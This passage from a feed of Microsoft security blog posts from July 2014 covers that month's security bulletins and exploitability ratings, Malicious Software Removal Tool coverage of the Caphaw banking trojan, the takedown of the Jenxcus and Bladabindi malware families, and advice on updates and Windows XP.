rendered.</td> <td>Critical</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-040">MS14-040</a> <p>(AFD.sys)</p> </td> <td>Attacker running code at low privilege runs exploit binary to elevate to SYSTEM.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td></td> <td>&nbsp;</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-041">MS14-041</a> <p>(Sandbox escape via DirectShow)</p> </td> <td>Attacker running code at low integrity level runs exploit binary to elevate to context of logged-on user.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-039">MS14-039</a> <p>(Sandbox escape via on-screen keyboard)</p> </td> <td>Attacker running code at low integrity level runs exploit binary to elevate to context of logged-on user.</td> <td>Important</td> <td>1</td> <td>Likely to see reliable exploits developed within next 30 days.</td> <td>&nbsp;</td> </tr> <tr> <td><a href="https://technet.microsoft.com/en-us/library/security/MS14-042">MS14-042</a> <p>(Service Bus)</p> </td> <td>Attacker could cause Service Bus to stop responding to incoming AMQP messages.</td> <td>Moderate</td> <td>n/a</td> <td>Lower severity issue unlikely to see significant attacker interest.</td> <td>Windows Azure not affected.</td> </tr> </tbody> </table> <p>- Jonathan Ness, MSRC</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3634265&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">Attack VectorRisk Asessmentrating Get security updates for July 2014http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/08/get-security-updates-for-july-2014.aspxTue, 08 Jul 2014 17:02:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10537359Eve Blakemore11http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10537359http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/08/get-security-updates-for-july-2014.aspx#comments<div class="post-content user-defined-markup"> <p>Microsoft releases security updates on the second Tuesday of every month.</p> <p><strong><a href="http://windows.microsoft.com/en-us/windows-8/windows-update-faq">Skip the details and check for&nbsp;the latest updates.</a></strong></p> <iframe src="http://www.youtube.com/embed/3j-5-xIMgks" frameborder="0" width="854" height="510"></iframe> <p>This bulletin announces the release of security updates for&nbsp;Windows, Microsoft Office, and other programs.</p> <ul> <li><a href="http://www.microsoft.com/security/pc-security/updates.aspx">Learn how to get security updates automatically</a></li> <li><a href="https://technet.microsoft.com/library/security/ms14-jul">For IT Pros: Microsoft Security Bulletin Summary for July 2014</a></li> </ul> <p>To get more information about security updates and other privacy and security issues delivered to your email inbox,&nbsp;<a href="http://www.microsoft.com/security/resources/newsletter.aspx">sign up for our newsletter</a>.</p> </div><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10537359" width="1" height="1">security updatespatch Tuesday July 2014 Security Bulletin Releasehttp://blogs.technet.com/b/msrc/archive/2014/07/08/july-2014-security-bulletin-release.aspxTue, 08 Jul 2014 16:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:6eff28fd-939f-4c99-b557-38c6a5dbb5d4Dustin C. Childs0<p>Many around the globe have been following the 2014 FIFA World Cup Brazil&trade; closely. Regardless of which country you are supporting, many folks have been impressed by the defensive display put on by keeper <a href="http://en.wikipedia.org/wiki/Tim_Howard">Tim Howard</a> in a loss against Belgium. It was a great performance highlighting a strong defense &ndash; always a good thing to have, be it on the pitch or on your system.</p> <p>This <a href="http://technet.microsoft.com/security/bulletin/MS14-jul">month&rsquo;s</a> release includes six new security bulletins, addressing 29 Common Vulnerability and Exposures (CVEs) in Microsoft Windows and Internet Explorer. Two of these security bulletins are rated Critical, three are rated Important, and one rated Moderate in severity. As always, we encourage you to apply all of the updates, but for those who prioritize, we recommend the <a href="https://technet.microsoft.com/library/security/ms14-038">Windows Journal</a> and <a href="https://technet.microsoft.com/library/security/ms14-037">Internet Explorer</a> (IE) updates be on the top of your list.</p> <p>If you are looking for additional resources to help you prioritize, take a look at our recently released <a href="http://mybulletins.technet.microsoft.com/">myBulletins</a> security bulletins customization free online service. myBulletins enables you to quickly find security bulletins using advanced search and filtering options. The service also provides a dynamic list in a customizable dashboard that can be edited at any time, as well as downloaded to a Microsoft Excel report. Give it a try, and let us know what you think by using the <a href="https://lab.msdn.microsoft.com/mailform/contactus.aspx?refurl=http%3a%2f%2ftechnet.microsoft.com%2fen-us%2fsecurity%2fbb291012.aspx&amp;loc=en-us">site feedback</a> link.</p> <p>Here&rsquo;s an overview of all of the updates released today:</p> <p><i>Click to enlarge<br /><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/2654.deployment.jpg"><img src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/2654.deployment.jpg" border="0" alt=" " /></a><br /></i></p> <p align="right"><i>*Bulletins in each deployment priority are listed in numerical order by bulletin number</i></p> <p>The security bulletin for <a href="https://technet.microsoft.com/library/security/ms14-038">Windows Journal</a> addresses one privately reported CVE that could allow an attacker to execute code on your system if you open a malicious Windows Journal file. It&rsquo;s worth noting that Windows Server versions do not have Windows Journal installed by default. That&rsquo;s by design. You are always at less risk when you have fewer applications installed, so server systems ship with many optional components disabled. If you haven&rsquo;t reviewed the applications installed on your server recently, now is a good time to do so. Reducing the attack surface will have a positive impact on the overall security of the server.</p> <p>The ongoing diligent work from our Internet Explorer team continues this month, with the security bulletin for <a href="https://technet.microsoft.com/library/security/ms14-037">Internet Explorer</a> addressing a total of 24 CVEs. The most critical of these could allow remote code execution if a user views a webpage specially crafted by a cybercriminal. Similar to last month, we have not seen any active attacks attempting to exploit any of the CVEs addressed by this security bulletin &ndash; or any of the other issues we addressed this month. Addressing these items before there is any customer impact from attacks remains our goal with security bulletins.</p> <p>To ensure you have our latest protections while browsing the Internet, you should really upgrade to the latest version of Internet Explorer. For Windows 7 and Windows 8.1, that means Internet Explorer 11 &ndash; the most modern, secure browser we have built. Internet Explorer 11 has advanced security features like <a href="http://msdn.microsoft.com/library/ie/dn265025(v=vs.85).aspx">Enhanced Protection Mode (EPM)</a> and <a href="http://windows.microsoft.com/en-us/internet-explorer/use-smartscreen-filter#ie=ie-11">SmartScreen Filter</a>, support for modern web standards, and Enterprise Mode for rendering legacy web apps. Internet Explorer 11 is much more secure than our older versions, which is why we encourage customers to upgrade.</p> <p>We also have three advisories to address today. The first is a revision to the <a href="https://technet.microsoft.com/en-us/library/security/2871997.aspx">Update to Improve Credentials Protection and Management</a>. This new package changes the default behavior for Restricted Admin mode on Windows 8.1 and Windows Server 2012 R2. This advisory deals with different strategies for combating credential theft, which is a hot topic today. Patrick Jungles (lead author) and team have a new whitepaper discussing ways to defend against pass-the-hash style attacks, and there is a new <a href="http://www.microsoft.com/pth">web resource</a> that covers various techniques and tactics to help prevent different types of credential theft attacks. Implementing these tactics <i>before</i> they are needed is another way to positively impact the overall security posture in an enterprise.</p> <p>The <a href="https://technet.microsoft.com/en-us/library/security/2960358.aspx">Update for Disabling RC4 in .NET TLS</a> has been revised as well. This update was revised to announce a Microsoft Update Catalog detection change for the updates requiring installation of the 2868725 prerequisite update. If you have already successfully installed this update, then you don&rsquo;t need to take any further action.</p> <p>Finally, we are revising <a href="http://technet.microsoft.com/security/advisory/2755801">Security Advisory 2755801</a> with the latest update for Adobe Flash Player in Internet Explorer. The update addresses the vulnerabilities described in Adobe Security bulletin APSB14-17. For more information about this update, including download links, see Microsoft Knowledge Base Article <a href="https://support.microsoft.com/kb/2974008">2974008</a>.</p> <p>For more information about this month&rsquo;s security updates, including the detailed view of the Exploit Index broken down by CVE, visit the <a href="http://technet.microsoft.com/security/bulletin/MS14-jul">Microsoft Bulletin Summary Web page</a>. Watch the bulletin overview video below for a brief summary of today&#39;s releases.</p> <p><object width="500" height="281"><param name="movie" value="//www.youtube.com/v/3j-5-xIMgks?version=3&amp;hl=en_US" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed src="http://www.youtube.com/v/3j-5-xIMgks?version=3&amp;hl=en_US" type="application/x-shockwave-flash" width="500" height="281" /></object></p> <p>Jonathan Ness and I will host the monthly security bulletin webcast, scheduled for Wednesday, July 9, 2014, at 11 a.m. PDT. There&rsquo;s no longer a need to register before this event to attend. You can find details on how to view the webcast and get a calendar reminder <a href="http://technet.microsoft.com/en-us/security/dn756352">here</a>. I invite you to tune in to learn more about this month&rsquo;s security bulletins.</p> <p>I look forward to hearing any questions about this month&rsquo;s release during our webcast tomorrow.</p> <p>For all the latest information, you can also follow us at <a href="http://www.twitter.com/msftsecresponse">@MSFTSecResponse</a>.</p> <p>Thanks,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3634229&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft WindowsSecurity BulletinSecurity AdvisoryInternet Explorer (IE) MSRT July 2014 - Caphawhttp://blogs.technet.com/b/mmpc/archive/2014/07/08/msrt-july-2014-caphaw.aspxTue, 08 Jul 2014 16:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:77daf74b-60e8-4bc2-b94c-bdc524f72545msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/07/08/msrt-july-2014-caphaw.aspx#comments<div class="ExternalClass4DDB26D4B75A44729514A31B04E532EE"> <p>This month we added <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Caphaw">Win32/Caphaw</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Bepush">Win32/Bepush</a> to the <a href="http://www.microsoft.com/security/pc-security/malware-removal.aspx">Malicious Software Removal Tool </a>(MSRT).</p> <p>Caphaw is a malware family that can be used by criminals to gain access to your PC - the ultimate goal is to steal your financial or banking-related information. The graph below shows the number of machine encounters we have seen since September 2013.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/caphaw.png"><img style="width:500px;height:230px;" alt="Caphaw encounter graph" src="http://www.microsoft.com/security/portal/blog-images/a/caphaw.png" border="0" /></a>&nbsp;</p> <em>Figure 1: Caphaw encounters</em> <p>Caphaw can be installed on a PC via malicious links posted on Facebook, YouTube, and Skype. It can also spread through infected removable drives and drive-by exploits.</p> <p>Once installed it can use a plugin mechanism to download several other programs from its command and control server. Here are some of the plugins and routines that we have seen being downloaded:</p> <ul> <li>Archiver &mdash; A command-line version of <em>winrar.exe</em> which is used to compress files before they are uploaded to remote servers.</li> <li>Backsocks &mdash;&nbsp;Allows remote connection&nbsp; to the infected machine with the ability to tunnel through private networks and firewalls.</li> <li>VNC &mdash;&nbsp; A backdoor that allows the attacker to run commands on an infected machine.</li> <li>Diskspread &mdash; Helps the threat to spread by writing itself to removable drives.</li> <li>Ftpgrabber &mdash; A password stealer.</li> <li>VideoGrabber &ndash; Used for video recording and uploading video to a remote server.</li> <li>MsgSpread &mdash; Helps Caphaw&nbsp;spread by posting Skype messages through the infected user&rsquo;s account.</li> <li>SpBot &mdash; A spamming routine.</li> <li>Rootkit/Bootkit &mdash; A master boot record infection routine.</li> <li>WebInject - Injects HTML codes to trick users and steal banking/financial related information.</li> </ul> <p>We have seen this family targeting the customers of a range of popular banks and financial institutions. It injects into the user&rsquo;s browser with data from the WebInject plugin as mentioned above. This mimics the requested bank&rsquo;s website and login page. The user&rsquo;s login data is then sent to servers controlled by Caphaw.&nbsp;&nbsp;&nbsp;&nbsp;</p> <p>Caphaw also has capabilities beyond just stealing banking information. It allows backdoor access even if the infected machine is behind firewalls or in a private network, which is commonly seen in&nbsp;commercial network setups. It can also steal other data, such as&nbsp;FTP passwords, and files from the user&rsquo;s machine.</p> <p>With it&rsquo;s modular plugin architecture, the malware author can develop almost any payload, and utilize Caphaw to deliver it to the infected machine.&nbsp;</p> <p>There is more information about this family in the <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Caphaw">Win32/Caphaw</a> description. &nbsp;&nbsp;</p> <p>The best protection from this and other threats is to run an up-to-date real-time security product such as <a href="http://www.microsoft.com/security/portal/mmpc/products/default.aspx">Microsoft Security Essentials</a>.</p> <p><em>Edgardo Diaz and Jody Koo</em></p> <p><em>MMPC</em></p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3633965&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Protecting Data and Privacy in the Cloud: Part 3http://blogs.technet.com/b/trustworthycomputing/archive/2014/07/07/protecting-data-and-privacy-in-the-cloud-part-3.aspxMon, 07 Jul 2014 16:04:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:824b396e-cf6e-4c6e-aa26-b8ef0ce5c4e6Trusted Cloud Team0<p><strong>By Brendon Lynch, Chief Privacy Officer, Microsoft</strong></p> <p><a href="/b/trustworthycomputing/archive/2014/06/05/protecting-data-and-privacy-in-the-cloud-part-2.aspx">In my last blog post</a>, I made the point that consumers and organizations choose a cloud service based on their ability to trust that the cloud service provider will protect their privacy. At Microsoft we work to earn that trust with specific data protection measures in place and with a promise to use data in a manner consistent with customer expectations. Our enterprise customers can rest assured that the data they entrust to us belongs to them.</p> <p>As organizations make the complex decision to invest in cloud services, we understand the importance of being transparent about our practices and policies. <span style="color:#0066dd;"><a href="/b/trustworthycomputing/archive/2014/06/27/protecting-data-and-privacy-in-the-cloud-part-3.aspx">See more &gt;&gt;</a></span></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/07/07/protecting-data-and-privacy-in-the-cloud-part-3.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3633723&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">Protecting Data and PrivacyBrendon Lynchdata privacyPrivacyCSA Star Get advance notice about July 2014 security updateshttp://blogs.msdn.com/b/securitytipstalk/archive/2014/07/03/get-advance-notice-about-july-2014-security-updates.aspxThu, 03 Jul 2014 17:20:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10537017Eve Blakemore9http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10537017http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/03/get-advance-notice-about-july-2014-security-updates.aspx#comments<p>Today, the Microsoft Security Response Center (MSRC) posted&nbsp;details&nbsp;about the&nbsp;<a href="http://technet.microsoft.com/en-us/security/bulletin/ms14-jul">July security updates</a>.</p> <p>If you have automatic updating turned on, most of these updates will download and install on their own. Sometimes you may need to provide input for Windows Update during an installation. In this case, you'll see an alert in the notification area at the far right of the taskbar&mdash;be sure to click it.</p> <p>In Windows 8, Windows will turn on automatic updating during setup unless you choose to turn it off. To check this setting and turn on automatic updating, open the<span class="apple-converted-space">&nbsp;</span><a href="http://windows.microsoft.com/en-us/windows-8/charms" target="_blank"><strong>Search charm</strong></a>, enter<span class="apple-converted-space">&nbsp;</span><strong>Turn automatic updating on or off</strong>, and tap or click<span class="apple-converted-space">&nbsp;</span><strong>Settings</strong><span class="apple-converted-space">&nbsp;</span>to find it.&nbsp;</p> <p><a href="http://windows.microsoft.com/en-us/windows7/install-windows-updates">Learn how to install Windows Updates in Windows 7</a>.</p> <p><strong>If you are a technical professional</strong></p> <p>The&nbsp;<a href="http://www.microsoft.com/technet/security/Bulletin/advance.mspx">Microsoft Security Bulletin Advance Notification Service</a>&nbsp;offers details about security updates approximately three business days before they are released. We do this to enable customers (especially IT professionals) to plan for effective deployment of security updates.</p> <p><a title="Sign up for security notifications" href="http://technet.microsoft.com/en-us/security/dd252948">Sign up for security notifications</a></p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10537017" width="1" height="1">updatesmalwaremonthly security updatesautomatic updatingAutomatic UpdatesMicrosoft UpdateWindows 7Windows Updateonline safetycybersecuritycybersafetyMicrosoft WindowsMicrosoftAdvance Notification ServiceANSWindows 8 Advance Notification Service for the July 2014 Security Bulletin Releasehttp://blogs.technet.com/b/msrc/archive/2014/07/03/advance-notification-service-for-the-july-2014-security-bulletin-release.aspxThu, 03 Jul 2014 16:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:3a66a683-01cc-45b0-bbed-e2a2301991d1Dustin C. Childs0<p>Today, we provide <a href="http://technet.microsoft.com/security/bulletin/MS14-jul">advance notification</a> for the release of six Security Bulletins. Two of these are rated Critical, three are rated as Important, and one is rated Moderate in severity. These Updates are for Microsoft Windows and Internet Explorer.</p> <p>This month we will also premier the new format for our Security Bulletin Webcast, scheduled on Wednesday, July 9, at 11 a.m. PDT. Registration, downloading the Live Meeting client, and dialing in to a separate number will no longer be required. You can find details on how to view the webcast <a href="http://technet.microsoft.com/en-us/security/dn756352">here</a>.</p> <p>As per our usual process, we&rsquo;ve scheduled the Security Bulletin release for the second Tuesday of the month, July 8, 2014, at approximately 10:00 a.m. PDT. Revisit this blog then for analysis of the relative impact, as well as deployment guidance, together with a brief video overview of the month&rsquo;s Updates. Until then, please review the <a href="http://technet.microsoft.com/security/bulletin/MS14-jul" title="ANS summary page">ANS summary page</a> for more information to help you prepare for Security Bulletin testing and deployment.</p> <p>Don&rsquo;t forget, you can also follow us on Twitter at <a href="https://twitter.com/msftsecresponse" title="@MSFTSecResponse">@MSFTSecResponse</a>.&nbsp;</p> <p>Thank you, <br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3634033&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft WindowsANSInternet Explorer (IE) Microsoft Expert Elevated Accessibility in Her 12 Years Leading a Key Industry Panelhttp://blogs.msdn.com/b/accessibility/archive/2014/07/03/microsoft-expert-elevated-accessibility-in-her-12-years-leading-a-key-industry-panel.aspxThu, 03 Jul 2014 15:13:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10537724Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10537724http://blogs.msdn.com/b/accessibility/archive/2014/07/03/microsoft-expert-elevated-accessibility-in-her-12-years-leading-a-key-industry-panel.aspx#commentsThe following blog post was written by Paul Nyhan, a staff writer with the Microsoft Accessibility Blog. Paul is a 20-year journalism veteran who has written extensively about disability issues. ----- Microsoft policy expert Laura Ruby ended her...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/07/03/microsoft-expert-elevated-accessibility-in-her-12-years-leading-a-key-industry-panel.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10537724" width="1" height="1"> The Secret of the SDL http://blogs.technet.com/b/security/archive/2014/07/02/the-secret-of-the-sdl.aspxWed, 02 Jul 2014 16:08:27 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:8eda4d3e-384b-4cc7-87ee-5294ec18b103Tim Rains - Microsoft0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3633678http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3633678http://blogs.technet.com/b/security/archive/2014/07/02/the-secret-of-the-sdl.aspx#comments<p>&ldquo;We all knew what the problems were, but the real issue was, things were getting worse and worse. How were we going to get ahead of this?&nbsp; That&rsquo;s what we really had to go fix.&rdquo; &ndash; Steve Lipner, Partner Director of Program Management at Microsoft.</p> <p>When researchers at a small firm called eEye Digital Security noticed a nasty self-replicating code known today as &ldquo;Code Red,&rdquo; little did they know that this worm named after a flavor of Mountain Dew, would also kick off the tech industry&rsquo;s best security model.&nbsp; Its stories like this one, captured in the new in depth magazine &ldquo;<a href="http://cspauthoring:8000/security/sdl/resources/publications.aspx">Life in the Digital Crosshairs; the dawn of the Microsoft Security Development Lifecycle</a>,&rdquo; that chronicles how the <a href="http://www.microsoft.com/security/sdl/default.aspx">Microsoft Security Development Lifecycle </a>(SDL) has been helping public and private organizations for the past 10 years, change their engineering cultures and develop more secure software.</p> <p>&ldquo;Our Secure Product Lifecycle is analogous to Microsoft&rsquo;s Security Development Lifecycle,&rdquo; says Brad Arkin, chief security officer at Adobe.&nbsp; &ldquo;We value this process and the information it helps protect.&rdquo; <a href="/b/security/archive/2014/07/07/the-secret-of-the-sdl.aspx">read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/07/02/the-secret-of-the-sdl.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3633678&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">SDL 10 YearLife in the Digital CrosshairsSecurity Development Lifecycle Windows XP registry hack will not protect your PC against all threatshttp://blogs.msdn.com/b/securitytipstalk/archive/2014/07/01/windows-xp-registry-hack-will-not-protect-your-pc-against-all-threats.aspxTue, 01 Jul 2014 15:28:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10537366Eve Blakemore28http://blogs.msdn.com/b/securitytipstalk/rsscomments.aspx?WeblogPostID=10537366http://blogs.msdn.com/b/securitytipstalk/archive/2014/07/01/windows-xp-registry-hack-will-not-protect-your-pc-against-all-threats.aspx#comments<p>In April, Microsoft <a href="http://blogs.msdn.com/b/securitytipstalk/archive/2014/04/08/get-security-updates-for-april-2014.aspx">ended support for Windows XP</a>. This means that if your computer is still running Windows XP, you are no longer receiving security updates.</p> <p><a href="http://www.bing.com/search?q=Windows+XP+registry+hack&amp;qs=n&amp;form=QBLH&amp;pq=windows+xp+registry+hack&amp;sc=3-24&amp;sp=-1&amp;sk=&amp;cvid=976b56ee73524a9482c662364314b377">Several tech news sources</a> have recently reported a change that you can make to your Windows registry (known as a &ldquo;registry hack&rdquo;) that tells your Windows XP computer that it&rsquo;s running Windows Embedded or Windows Server 2003.</p> <p>Although this hack might allow your Windows XP computer to receive automatic updates, these updates will not fully protect your Windows XP computer. And because these updates are not intended for Windows XP, they might also cause your computer to stop working correctly.</p> <p>If you are running Windows XP, the best way to protect your computer is to upgrade to a modern operating system, like Windows 8.1.</p> <p><a href="http://windows.microsoft.com/en-us/eos">Learn more about your options if your computer is still running Windows XP</a></p><div style="clear:both;"></div><img src="http://blogs.msdn.com/aggbug.aspx?PostID=10537366" width="1" height="1">updatesmonthly security updatessecurity updatesautomatic updatingAutomatic UpdatessecurityMicrosoft UpdateWindows 7Windows Updatepatch TuesdayWindows XPMicrosoft WindowsWindows 8registry hack Surface Pro and Xbox One Help Washington Man Overcome a Life-changing Injuryhttp://blogs.msdn.com/b/accessibility/archive/2014/07/01/tyler-readmore.aspxTue, 01 Jul 2014 14:10:00 GMT91d46819-8472-40ad-a661-2c78acb4018c:10537726Daniel Hubbell - MSFT0http://blogs.msdn.com/b/accessibility/rsscomments.aspx?WeblogPostID=10537726http://blogs.msdn.com/b/accessibility/archive/2014/07/01/tyler-readmore.aspx#commentsAfter Tyler Schrenk was paralyzed from the neck down in an accident two years ago connections many of us take for granted &ndash; email, online news websites, Facebook and other social media &ndash; became far harder. Now, a Microsoft Surface Pro is helping...(<a href="http://blogs.msdn.com/b/accessibility/archive/2014/07/01/tyler-readmore.aspx">read more</a>)<img src="http://blogs.msdn.com/aggbug.aspx?PostID=10537726" width="1" height="1"> Advancing our encryption and transparency efforts http://blogs.technet.com/b/trustworthycomputing/archive/2014/07/01/advancing-our-encryption-and-transparency-efforts.aspxTue, 01 Jul 2014 13:33:33 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:7c6c334b-c95a-46bc-b60d-b1aec56b3e6aTrusted Cloud Team0<p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong></p> <p>As a company, we have been working hard to further increase data security protections in our services, to&nbsp; add capacity to our transparency center&nbsp; engagements with governments, and to push governments to be more transparent themselves.&nbsp;</p> <p>In December, we <a href="/b/microsoft_blog/archive/2013/12/04/protecting-customer-data-from-government-snooping.aspx"><span style="color:#0066dd;">announced our commitment </span></a>to increase the security of our customers&rsquo; data, and our plans to reinforce legal protections for our customers&rsquo; data.&nbsp; In January, we <a href="/b/microsoft_on_the_issues/archive/2014/01/20/time-for-an-international-convention-on-government-access-to-data.aspx"><span style="color:#0066dd;">called for an international convention focused on the issue of government access to data</span></a>.&nbsp; Then in March, we shared the <a href="/b/microsoft_on_the_issues/archive/2014/03/28/we-re-listening-additional-steps-to-protect-your-privacy.aspx"><span style="color:#0066dd;">additional steps we took to protect your privacy</span></a>.&nbsp;</p> <p>We are committed to earning our customers&rsquo; trust each and every day, and today, Matt Thomlinson, vice president for Trustworthy Computing Security, shares&nbsp; the progress we are making on these fronts. I encourage you to check out his <a href="/b/microsoft_on_the_issues/archive/2014/07/01/advancing-our-encryption-and-transparency-efforts.aspx"><span style="color:#0066dd;">Microsoft on the Issues blog post </span></a>to learn more about this announcement.&nbsp; <a href="/b/trustworthycomputing/archive/2014/07/01/advancing-our-encryption-and-transparency-efforts.aspx" target="_blank"><span style="color:#0066dd;">See more &gt;&gt;</span></a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/07/01/advancing-our-encryption-and-transparency-efforts.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3633916&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1"> Microsoft Digital Crimes Unit disrupts Jenxcus and Bladabindi malware familieshttp://blogs.technet.com/b/mmpc/archive/2014/06/30/microsoft-digital-crimes-unit-disrupts-jenxcus-and-bladabindi-malware-families.aspxMon, 30 Jun 2014 20:00:38 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:1820cd33-36f5-43d0-9e40-61fa4adf33demsft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/06/30/microsoft-digital-crimes-unit-disrupts-jenxcus-and-bladabindi-malware-families.aspx#comments<div class="ExternalClassB429D66583E74E6287457BDA4BC0BCD6"> <p>​Today, following an investigation to which the Microsoft Malware Protection Center (MMPC) contributed, the Microsoft Digital Crimes Unit initiated a disruption of the <a href="http://www.microsoft.com/security/portal/threat/Encyclopedia/Entry.aspx?Name=VBS/Jenxcus">Jenxcus</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=MSIL/Bladabindi">Bladabindi</a> malware families. These families are believed to have been created by individuals Naser Al Mutairi, aka njQ8, and Mohamed Benabdellah, aka Houdini. These actions are the first steps to stop the people that created, distributed, and assisted the propagation of these malware families.</p> <p>There are more details about the takedown itself in the latest blog from the <a href="http://blogs.technet.com/b/microsoft_blog/">Microsoft Digital Crimes Unit</a>.</p> <p>At the MMPC we have been monitoring both malware families for some time. We have observed the Bladabindi family since at least July 2012. Jenxcus came onto the scene as early as December 2012. During the past year, Microsoft detected more than 7,486,833 instances of computers operating Microsoft Windows with some version of Bladabindi or Jenxcus.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/DCU1.png"> <img width="500" alt="Malware heat map" src="http://www.microsoft.com/security/portal/blog-images/a/DCU1.png" border="0" /></a>&nbsp;</p> <p><em>Figure 1: Heat map showing the global impact of Bladabindi and Jenxcus during the past year </em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/DCU2.png"> <img width="500" alt="Jenxcus machine count" src="http://www.microsoft.com/security/portal/blog-images/a/DCU2.png" border="0" /></a>&nbsp;</p> <p><em>Figure 2: Machine encounters per month for Jenxcus</em></p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/DCU3.png"><img width="500" alt="Bladabindi machine count" src="http://www.microsoft.com/security/portal/blog-images/a/DCU3.png" border="0" /></a>&nbsp;</p> <p><em>Figure 3: Machine encounters per month for Bladabindi </em></p> <p>These families can install backdoor trojans on your computer, which allow criminals to steal your information, such as your passwords, and use your computer to collect other sensitive information. For example, Bladabindi can take snapshots and record videos without your permission. It can also control your system remotely.</p> <p>These backdoor trojans can also upload new components or malware to your computer to add more malicious functionality. They often communicate with hosts that are typically a Dynamic DNS service such as NO-IP because this makes them more difficult to trace.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/DCU4a.png"><img width="500" alt="Control dashboard" src="http://www.microsoft.com/security/portal/blog-images/a/DCU4a.png" border="0" /></a>&nbsp;</p> <p><em>Figure 4: An example dashboard showing how an attacker controls infected machines</em></p> <em></em> <p><em></em> <a href="http://www.microsoft.com/security/portal/blog-images/a/DCU5a.png"> <em> </em> <img width="500" alt="Malware commands" src="http://www.microsoft.com/security/portal/blog-images/a/DCU5a.png" border="0" /></a> <em>&nbsp;</em></p> <p><em> </em> <em> Figure 5: The possible commands available to the malware writer</em></p> <p>These malware families spread primarily through social engineering techniques that try to trick unsuspecting victims into carrying out some action which results in their computer getting infected. For example, Bladabindi can be installed when you:</p> <ul> <li>Visit a hacked website.</li> <li>Click on a malicious link in a&nbsp;social media message.</li> <li>Receive and open an email &ldquo;sent&rdquo; by friends and family who have been infected with the malware.</li> </ul> <p>Bladabindi also plants files with enticing names and icons on removable media and linked drives to lure new victims. There are more example of these techniques in our blog <a href="http://blogs.technet.com/b/mmpc/archive/2014/01/14/msrt-january-2014-bladabindi.aspx">MSRT January 2014 &ndash; Bladabindi</a>.</p> <p>Most Jenxcus infections occur through torrents and websites when the malware is bundled with other programs or videos. Jenxcus also tries to&nbsp;trick you into installing it by pretending to be a Flash update that you need to install before watching a video. After infecting a computer, Jenxcus leaves enticing shortcut files on removable media that look like songs or other personal files. When opened these files run a copy of the malware.</p> <p>Through our research we have observed that there is information available in public online forums and group discussions, including tutorials, which allow anyone to download a package and create their own versions of the malware. This makes Bladabindi and Jenxcus a bit 